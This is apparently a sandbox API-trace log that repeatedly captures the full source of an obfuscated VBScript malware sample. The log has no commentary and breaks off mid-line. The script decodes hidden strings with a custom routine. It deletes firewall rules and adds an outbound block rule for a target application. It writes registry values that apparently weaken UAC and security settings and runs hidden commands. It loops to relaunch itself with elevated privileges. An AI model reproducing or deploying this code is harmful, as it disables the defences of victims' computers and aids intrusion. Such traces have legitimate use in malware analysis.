newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0226.307] wcsncmp (_String1=",1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0226.307] wcsncmp (_String1="1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0226.307] wcsncmp (_String1="))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0226.307] wcsncmp (_String1=")-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 